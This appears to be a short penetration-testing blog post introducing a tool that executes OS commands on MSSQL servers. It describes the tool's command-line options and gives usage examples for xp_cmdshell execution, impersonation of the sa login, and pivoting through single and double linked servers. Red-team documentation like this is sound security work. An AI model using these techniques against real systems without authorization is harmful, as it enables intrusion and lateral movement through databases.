November 9, 2023
Code Execution via MSSQL
Written by Gervin Appiah
Background
It is not uncommon to discover MSSQL when testing Windows environments. If you have obtained some privileged credentials, MSSQL presents you with an alternative way of getting code execution on the servers running it. An opportunity that should not be passed up.
Below I highlight a tool which is essentially just a wrapper around Cas Van Cooten’s MSSQL code found on his github.
https://github.com/chvancooten/OSEP-Code-Snippets
Usage
I couldn’t come up with a good name for the tool, so I decided to go with the first thing that came into my head, SQLinkedCodeExec.
The tool allows the user to:
perform basic enumeration on MSSQL server(s)
- execute commands on the backend OS hosting the MSSQL server(s)
- perform basic enumeration on MSSQL server(s)
It accepts user supplied credentials or leverages the access token of the logged-on user. The basic syntax is:
SQLinkedCodeExec.exe /t <target> /user <username> /pass <password> <command-to-run>
It currently supports the below options:
/codexec - executes specified code on MSSQL servers
/impersonate - impersonates sa user on MSSQL server
/imp_db - specifies the database for impersonation e.g. msdb. This must be used with imp_user
/imp_user - impersonates specified login on a MSSQL server e.g. sa
/localexec - enables code execution via xp_cmdshell on local MSSQL server
/link1exec - enables code execution via xp_cmdshell on single hop linked MSSQL - Link 1
/link2exec - enables code execution via xp_cmdshell on double hop linked MSSQL - Link 2
/lnk - determines if the target MSSQL server has any linked servers
/lnkedt - specifies the linked server connected to our target MSSQL - Link 1
/lnkedtt - specifies the double linked server connect to our target MSSQL - Link 2
/lnkedtcheck1 - enumerates linked server - Link 1
/lnkedtcheck2 - enumerates double linked server - Link 1
/pass - specifies password to use
/t - specifies the target MSSQL server
/syscreds - ignores the user specified and uses the token of the currently logged in user
/user - specifies the target user account
Some usage examples include:
To show the help menu
SQLinkedCodeExec.exe /? - show's this help menu"
To authenticate to a target MSSQL with username and password
SQLinkedCodeExec.exe /t <target name or IP> /user <username> /pass <password"
To authenticate to a target MSSQL with current system token
SQLinkedCodeExec.exe /t <target name or IP> /user <username> /pass <password> /syscreds true"
To execute Code on target MSSQL server
SQLinkedCodeExec.exe /t <target name or IP> /user <username> /pass <password> /localexec true /codexec < Whatever - command - goes - here >"
To check if target MSSQL server has any links to another MSSQL server
SQLinkedCodeExec.exe /t <target name or IP> /syscreds true /lnk true"
To execute Code on linked MSSQL server instance (sqlserv2) - Link 1
SQLinkedCodeExec.exe /t <target name or IP> /syscreds true /link1exec true /lnkedt sqlserv2 /codexec <powershell - enc...>"
To impersonate sa account and execute Code on linked MSSQL server instance (sqlserv2) - Link 1"
SQLinkedCodeExec.exe /t <target name or IP> /syscreds true /lnk true /impersonate true /imp_user sa /imp_db msdb /codexec <powershell - enc>"
To enumerate linked MSSQL server (sqlserv2) for additional links to other instances - Link 1"
SQLinkedCodeExec.exe /t <target name or IP> /syscreds true /lnkedt sqlserv2 /lnkedtcheck1 true"
To check double linked server (sqlserv3) for the user we are operating as - Link 1"
SQLinkedCodeExec.exe /t <target name or IP> /syscreds true /lnkedt sqlserv2 /lnkedtt sqlserv3 /lnkedtcheck2 true"
To execute code on double linked server (sqlserv3)"
SQLinkedCodeExec.exe /t <target name or IP> /user someguy /pass somepass /syscreds true /lnk true /link2exec true /lnkedt sqlserv2 /lnkedtt sqlserv3 /codexec <powershell - enc....>"
The source code for the tool can be found on my github
https://github.com/anans3-gh/SQLinkedCodeExec
YouTube Video
Below is a link to see the tool in action on my YouTube channel